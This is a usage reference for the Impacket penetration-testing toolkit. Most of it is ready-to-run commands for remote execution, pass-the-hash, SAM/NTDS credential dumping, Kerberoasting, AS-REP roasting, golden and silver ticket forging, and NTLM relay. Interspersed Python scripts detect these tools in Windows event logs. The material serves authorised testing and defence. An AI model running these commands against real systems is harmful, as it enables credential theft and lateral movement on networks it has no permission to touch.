Tags: cli-tool, intermediate, utility
## Synopsis

Impacket is a collection of Python classes for working with network protocols. It provides low-level programmatic access to packets and implements several protocols, including SMB, MSRPC and Kerberos. Impacket ships with numerous ready-to-use tools for penetration testing, focused especially on Windows environments.

Warning: Impacket is a security testing tool that should only be used in environments where you have explicit permission to do so.
## Installation

### From PyPI

```bash
pip install impacket
```

### From GitHub

```bash
git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install
```

### On Kali Linux

```bash
sudo apt update
sudo apt install -y python3-impacket
```

### Using a virtual environment

```bash
# Create and activate a virtual environment
python -m venv impacket-env
source impacket-env/bin/activate    # Linux/macOS
impacket-env\Scripts\activate.bat   # Windows
# Install Impacket
pip install impacket
```
## Command execution tools

### psexec.py

Executes commands on remote Windows systems over the SMB protocol, similar to SysInternals PsExec.

#### Basic usage

```bash
psexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-k` | Use Kerberos authentication |
| `-no-pass` | Don't ask for a password (useful for Kerberos) |
| `-port [port]` | Connect to SMB server port (default: 445) |
| `-debug` | Turn DEBUG output ON |

#### Examples

```bash
# Execute a command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe
# Execute a command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe
# Execute a specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"
# Use a hash instead of a password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe
```
### smbexec.py

Similar to psexec.py, but uses a different technique to execute commands, which can make it stealthier.

#### Basic usage

```bash
smbexec.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-share SHARE` | Share from which the output will be read (default: ADMIN$) |
| `-shell-type {cmd,powershell}` | Shell type to use (default: cmd) |
| `-codec CODEC` | Encoding (codec) used to decode the target's output (default: UTF-8) |
| `-service-name NAME` | Service name to use (default: random) |

#### Examples

```bash
# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100
# Use a hash instead of a password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100
```
### wmiexec.py

Executes commands on remote Windows systems using WMI.

#### Basic usage

```bash
wmiexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-share SHARE` | Share from which the output will be read (default: ADMIN$) |
| `-silentcommand` | Execute the command and return immediately, without output |
| `-codec CODEC` | Encoding (codec) used to decode the target's output (default: UTF-8) |
| `-shell-type {cmd,powershell}` | Shell type to use (default: cmd) |

#### Examples

```bash
# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100
# Execute a specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"
# Use a hash instead of a password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```
### dcomexec.py

Executes commands on remote Windows systems using DCOM objects.

#### Basic usage

```bash
dcomexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-object {ShellWindows,ShellBrowserWindow,MMC20}` | DCOM object to use (default: MMC20.Application) |
| `-silentcommand` | Execute the command and return immediately, without output |
| `-codec CODEC` | Encoding (codec) used to decode the target's output (default: UTF-8) |
| `-shell-type {cmd,powershell}` | Shell type to use (default: cmd) |

#### Examples

```bash
# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100
# Execute with a specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100
# Use a hash instead of a password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```
### atexec.py

Executes commands on remote Windows systems using the Task Scheduler service.

#### Basic usage

```bash
atexec.py [domain/]username[:password]@target [options] command
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-silentcommand` | Execute the command and return immediately, without output |
| `-codec CODEC` | Encoding (codec) used to decode the target's output (default: UTF-8) |

#### Examples

```bash
# Execute a command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\temp\whoami.txt"
# Execute a command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\temp\whoami.txt"
# Use a hash instead of a password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\temp\whoami.txt"
```
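Each of the five execution tools above leaves host-side artifacts a defender can alert on: psexec.py and smbexec.py install a service (randomly named by default) whose binary or command line touches an administrative share, wmiexec.py and dcomexec.py spawn a shell under WmiPrvSE.exe or mmc.exe that redirects its output to ADMIN$, and atexec.py registers a one-off scheduled task that writes its output to a temp file. The script below is an added detection example written for this page, not Impacket project code. The event field names and the sample events are constructed to mimic parsed Windows System/Security log records (7045 service installed, 4688 process created, 4698 scheduled task created), and the path patterns it matches are assumptions drawn from the tools' default behaviour described above.

```python
"""Heuristics for spotting Impacket-style remote execution in Windows event logs.

Added example (not Impacket code). Events are plain dicts with simplified field
names; real collectors (Sysmon, winlogbeat, a SIEM) will need a field mapping.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Output redirected to a local admin share over loopback, e.g. \\127.0.0.1\ADMIN$\__1700000000
ADMIN_SHARE_UNC = re.compile(r"\\\\127\.0\.0\.1\\(ADMIN\$|C\$)\\", re.I)
# Short, all-letter names like the random service/task names Impacket generates by default
RANDOM_LETTERS = re.compile(r"^[A-Za-z]{4,8}$")
# A random 8-letter executable dropped directly into the Windows directory (ADMIN$)
SYSTEMROOT_RANDOM_EXE = re.compile(r"^(%systemroot%|c:\\windows)\\[a-z]{8}\.exe$", re.I)
# cmd /C ... > <somewhere>\Temp\<file>: one-off task capturing output to a temp file
TEMP_REDIRECT = re.compile(r">\s*\S*\\temp\\\S+", re.I)
# Parents that host WMI (wmiexec.py) and the MMC20.Application DCOM object (dcomexec.py)
WMI_DCOM_PARENTS = {"wmiprvse.exe", "mmc.exe"}


@dataclass
class Finding:
    event_id: int
    host: str
    reason: str


def inspect_event(ev: dict) -> Optional[Finding]:
    """Return a Finding if the event matches one of the execution-tool patterns."""
    eid, host = ev.get("EventID"), ev.get("Computer", "?")
    if eid == 7045:  # a service was installed
        name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
        if ADMIN_SHARE_UNC.search(path):
            return Finding(eid, host, f"service {name!r} pipes output to an admin share (smbexec-style)")
        if RANDOM_LETTERS.match(name) and SYSTEMROOT_RANDOM_EXE.match(path):
            return Finding(eid, host, f"service {name!r} runs random binary {path} (psexec-style)")
    elif eid == 4688:  # a process was created
        parent = ev.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
        if parent in WMI_DCOM_PARENTS and ADMIN_SHARE_UNC.search(ev.get("CommandLine", "")):
            return Finding(eid, host, f"{parent} spawned a shell writing to an admin share (wmiexec/dcomexec-style)")
    elif eid == 4698:  # a scheduled task was created
        name, cmd = ev.get("TaskName", "").strip("\\"), ev.get("TaskCommand", "")
        if RANDOM_LETTERS.match(name) and "/c" in cmd.lower() and TEMP_REDIRECT.search(cmd):
            return Finding(eid, host, f"one-off task {name!r} redirects output to Temp (atexec-style)")
    return None


def scan(events):
    """Run inspect_event over a stream of events and keep the hits."""
    return [f for f in (inspect_event(e) for e in events) if f]


# Constructed sample records: four tool-like events and two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "kRbQ",
     "ImagePath": r"%systemroot%\PcVwOgFa.exe"},
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "XyZw",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>&1 > %TEMP%\execute.bat"},
    {"EventID": 4688, "Computer": "WS02", "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c ipconfig /all 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"EventID": 4698, "Computer": "WS03", "TaskName": r"\gHtSkLpQ",
     "TaskCommand": r"cmd.exe /C whoami > C:\Windows\Temp\gHtSkLpQ.tmp 2>&1"},
    {"EventID": 7045, "Computer": "WS04", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 4688, "Computer": "WS04", "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.host}: {f.reason}")
```

The 7045 service rule is the highest-signal one: legitimate services are rarely installed with a four-letter name and a random binary in `%systemroot%`. The 4688 rule needs command-line logging enabled (it is off by default), and the 4698 rule needs the "Other Object Access Events" audit subcategory.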
### secretsdump.py

Extracts credentials from a remote Windows system, including the SAM, LSA Secrets and NTDS.dit.

#### Basic usage

```bash
secretsdump.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-just-dc` | Extract only NTDS.DIT data (domain controller only) |
| `-just-dc-ntlm` | Extract only NTDS.DIT NTLM hashes (domain controller only) |
| `-just-dc-user USER` | Extract only NTDS.DIT data for a specific user |
| `-pwd-last-set` | Show the pwdLastSet attribute for each NTDS.DIT account |
| `-user-status` | Show whether each user is enabled or disabled |
| `-history` | Dump password history |
| `-outputfile FILE` | Write output to a file |

#### Examples

```bash
# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100
# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100
# Dump credentials using a hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL
# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100
```
## Kerberos attack tools

### GetNPUsers.py

Retrieves password hashes for users that have "Do not require Kerberos preauthentication" set (ASREPRoast attack).

#### Basic usage

```bash
GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]
```

#### Common options

| Option | Description |
|---|---|
| `-request` | Request TGTs for the users and output them in JtR/hashcat format |
| `-no-pass` | Don't ask for a password (useful for Kerberos) |
| `-k` | Use Kerberos authentication |
| `-dc-ip IP` | IP address of the domain controller |
| `-usersfile FILE` | File with one user per line to test |
| `-format {hashcat,john}` | Format in which to save the AS-REP responses (default: hashcat) |
| `-outputfile FILE` | Output file for the ciphers in JtR/hashcat format |

#### Examples

```bash
# Get users without Kerberos preauthentication, with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request
# Get users without Kerberos preauthentication, for a specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1
# Test a list of users for missing Kerberos preauthentication
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat
# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass
```
### GetUserSPNs.py

Retrieves Service Principal Names (SPNs) for accounts in the domain (Kerberoasting attack).

#### Basic usage

```bash
GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]
```

#### Common options

| Option | Description |
|---|---|
| `-request` | Request TGS tickets for the users and output them in JtR/hashcat format |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-dc-ip IP` | IP address of the domain controller |
| `-target-user USER` | Request a TGS only for this specific user |
| `-outputfile FILE` | Output file for the ciphers in JtR/hashcat format |
| `-format {hashcat,john}` | Format in which to save the TGS tickets (default: hashcat) |

#### Examples

```bash
# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request
# Get the SPN for a specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice
# Output hashes in a specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat
# Use a hash instead of a password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request
```
### ticketer.py

Creates Golden and Silver Tickets for Kerberos authentication.

#### Basic usage

```bash
ticketer.py [options] username
```

#### Common options

| Option | Description |
|---|---|
| `-nthash HASH` | NT hash of the user or service account |
| `-aesKey KEY` | AES key of the user or service account |
| `-domain DOMAIN` | Domain name |
| `-domain-sid SID` | Domain SID |
| `-spn SPN` | Service Principal Name (for Silver Tickets) |
| `-groups IDS` | Comma-separated list of group IDs to include in the ticket |
| `-duration HOURS` | Ticket duration in hours (default: 10) |
| `-out FILE` | Output file in which to save the ticket |

#### Examples

```bash
# Create a Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator
# Create a Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator
# Specify the output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator
```
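On the detection side, the three Kerberos tools above each leave a signature in the domain controller's Security log: GetNPUsers.py produces 4768 (TGT requested) events with Pre-Authentication Type 0, GetUserSPNs.py produces a burst of 4769 (service ticket requested) events with RC4 encryption (0x17) for many different SPNs from one account, and a ticket forged with ticketer.py shows up as 4769 requests for an account to which no DC issued a TGT (4768) within the ticket lifetime (ticketer.py's default `-duration` of 10 hours matches the domain default). The following is an added example written for this page, not Impacket code. The event records are constructed dicts with simplified field names, and the thresholds are assumptions to tune per environment; the forged-ticket heuristic in particular only works when 4768 events from every DC are collected together.

```python
"""Kerberos abuse detectors over parsed 4768/4769 domain-controller events.

Added example (not Impacket code). Events are dicts with simplified fields:
EventID, Time (datetime), TargetUserName, Status, PreAuthType (4768),
ServiceName and TicketEncryptionType (4769). Real logs carry user@REALM and
hex strings; normalise them before feeding them in.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                      # etype roasting tools request so the hash is cheap to crack
NO_PREAUTH = 0                       # Pre-Authentication Type 0: TGT issued without pre-auth
TGT_LIFETIME = timedelta(hours=10)   # default domain TGT lifetime, same as ticketer's -duration


def detect_asrep_roast(events):
    """Accounts that obtained a TGT without pre-authentication (ASREPRoast exposure or use)."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["Status"] == "0x0" and e["PreAuthType"] == NO_PREAUTH})


def detect_kerberoast(events, min_spns=5, window=timedelta(minutes=10)):
    """Accounts requesting RC4 service tickets for >= min_spns distinct SPNs inside one window."""
    by_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769 and e["Status"] == "0x0" and e["TicketEncryptionType"] == RC4_HMAC:
            by_user[e["TargetUserName"]].append((e["Time"], e["ServiceName"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):   # slide the window over the sorted requests
            spns = {spn for t, spn in reqs[i:] if t - start <= window}
            if len(spns) >= min_spns:
                flagged[user] = sorted(spns)
                break
    return flagged


def detect_tgs_without_tgt(events, lifetime=TGT_LIFETIME):
    """Accounts using a TGT no DC issued: a service-ticket request with no 4768 in the lifetime window."""
    issued = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == "0x0":
            issued[e["TargetUserName"]].append(e["Time"])
    suspicious = set()
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        user, t = e["TargetUserName"], e["Time"]
        if not any(timedelta(0) <= t - when <= lifetime for when in issued.get(user, [])):
            suspicious.add(user)
    return sorted(suspicious)


# Constructed sample timeline: one normal user, one account without pre-auth,
# a burst of RC4 ticket requests, and a service ticket with no matching TGT.
T0 = datetime(2024, 1, 15, 9, 0, 0)


def _tgt(minutes, user, preauth, etype=0x12):
    return {"EventID": 4768, "Time": T0 + timedelta(minutes=minutes), "TargetUserName": user,
            "Status": "0x0", "PreAuthType": preauth, "TicketEncryptionType": etype}


def _tgs(minutes, user, spn, etype):
    return {"EventID": 4769, "Time": T0 + timedelta(minutes=minutes), "TargetUserName": user,
            "Status": "0x0", "ServiceName": spn, "TicketEncryptionType": etype}


SAMPLE_EVENTS = [
    _tgt(0, "jdoe", preauth=2),                     # normal: PA-ENC-TIMESTAMP pre-auth
    _tgt(1, "svc_legacy", preauth=0, etype=0x17),   # "Do not require Kerberos preauthentication"
    _tgs(2, "jdoe", "cifs/fs01", 0x12),             # normal AES service ticket
    _tgs(5, "jdoe", "MSSQLSvc/sql01", 0x17),        # burst of RC4 tickets to many SPNs
    _tgs(6, "jdoe", "MSSQLSvc/sql02", 0x17),
    _tgs(7, "jdoe", "http/web01", 0x17),
    _tgs(8, "jdoe", "http/web02", 0x17),
    _tgs(9, "jdoe", "ldap/dc01", 0x17),
    _tgs(60, "administrator", "cifs/dc01", 0x12),   # no 4768 for this account anywhere
]

if __name__ == "__main__":
    print("ASREPRoast:", detect_asrep_roast(SAMPLE_EVENTS))
    print("Kerberoast:", detect_kerberoast(SAMPLE_EVENTS))
    print("TGS without TGT:", detect_tgs_without_tgt(SAMPLE_EVENTS))
```

The first two detectors also point at the mitigations: remove the "Do not require Kerberos preauthentication" flag from the flagged accounts, and move service accounts to AES-only keys (or gMSAs) so an RC4 ticket request stands out instead of being the norm.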
## Network protocol tools

### smbclient.py

Provides an SMB client for accessing shares and files on remote systems.

#### Basic usage

```bash
smbclient.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-port [port]` | Connect to SMB server port (default: 445) |
| `-file FILE` | Input file with commands to execute in the mini shell |
| `-debug` | Turn DEBUG output ON |

#### Common commands (interactive shell)

| Command | Description |
|---|---|
| `help` | Show available commands |
| `shares` | List available shares |
| `use <share>` | Connect to a specific share |
| `ls` | List files in the current directory |
| `cd <dir>` | Change directory |
| `get <file>` | Download a file |
| `put <file>` | Upload a file |
| `rm <file>` | Delete a file |
| `mkdir <dir>` | Create a directory |
| `rmdir <dir>` | Remove a directory |
| `exit` | Exit the shell |

#### Examples

```bash
# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100
# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100
# Use a hash instead of a password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```
### mssqlclient.py

Provides a client for interacting with Microsoft SQL Server instances.

#### Basic usage

```bash
mssqlclient.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-windows-auth` | Use Windows authentication (default: False) |
| `-port [port]` | Destination port to connect to (default: 1433) |
| `-db DATABASE` | MSSQL database instance (default: None) |
| `-file FILE` | Input file with commands to execute in the SQL shell |
| `-debug` | Turn DEBUG output ON |

#### Common commands (interactive shell)

| Command | Description |
|---|---|
| `help` | Show available commands |
| `enable_xp_cmdshell` | Enable the xp_cmdshell stored procedure |
| `disable_xp_cmdshell` | Disable the xp_cmdshell stored procedure |
| `xp_cmdshell <command>` | Execute a command through xp_cmdshell |
| `sp_start_job <job>` | Start a SQL Server job |
| `exit` | Exit the shell |

#### Examples

```bash
# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100
# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100
# Use a hash instead of a password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100
# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth
```
## Other useful tools

### ntlmrelayx.py

Performs NTLM relay attacks.

#### Basic usage

```bash
ntlmrelayx.py [options]
```

#### Common options

| Option | Description |
|---|---|
| `-t TARGET` | Target to relay the credentials to |
| `-tf FILE` | File with targets to relay the credentials to |
| `-w` | Start the HTTP server and do not relay credentials |
| `-e FILE` | Execute this file when a connection is relayed |
| `-c COMMAND` | Execute this command when a connection is relayed |
| `-smb2support` | Enable SMB2 support |
| `-socks` | Launch a SOCKS proxy for the connection |
| `-one-shot` | Relay only one connection |
| `-debug` | Turn DEBUG output ON |

#### Examples

```bash
# Relay to a specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support
# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support
# Execute a command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\temp\whoami.txt"
# Dump the SAM database on successful relay (the default action when no -c/-e is given)
ntlmrelayx.py -t smb://192.168.1.100 -smb2support
# Start a SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks
```
### lookupsid.py

Performs SID lookups to enumerate users and groups.

#### Basic usage

```bash
lookupsid.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-domain DOMAIN` | Domain to enumerate (default: target domain) |
| `-debug` | Turn DEBUG output ON |

#### Examples

```bash
# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100
# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100
# Use a hash instead of a password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```
### reg.py

Provides remote registry manipulation.

#### Basic usage

```bash
reg.py [domain/]username[:password]@target [options] action [params]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-debug` | Turn DEBUG output ON |

#### Actions

| Action | Description |
|---|---|
| `query` | Query a registry key or value |
| `add` | Add a registry key or value |
| `delete` | Delete a registry key or value |
| `save` | Save a registry hive to a file |

#### Examples

```bash
# Query a registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
# Add a registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\SOFTWARE\Test -v TestValue -vt REG_SZ -vd "Test Data"
# Delete a registry key with a hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\SOFTWARE\Test
```
## Common parameters

| Parameter | Description |
|---|---|
| `-h, --help` | Show the help message and exit |
| `-debug` | Turn DEBUG output ON |
| `-hashes LMHASH:NTHASH` | NTLM hashes, in the format LMHASH:NTHASH |
| `-no-pass` | Don't ask for a password (useful for Kerberos) |
| `-k` | Use Kerberos authentication |
| `-aesKey KEY` | AES key to use for Kerberos authentication |
| `-dc-ip IP` | IP address of the domain controller |
| `-target-ip IP` | IP address of the target machine |
| `-port [port]` | Destination port to connect to |
## Resources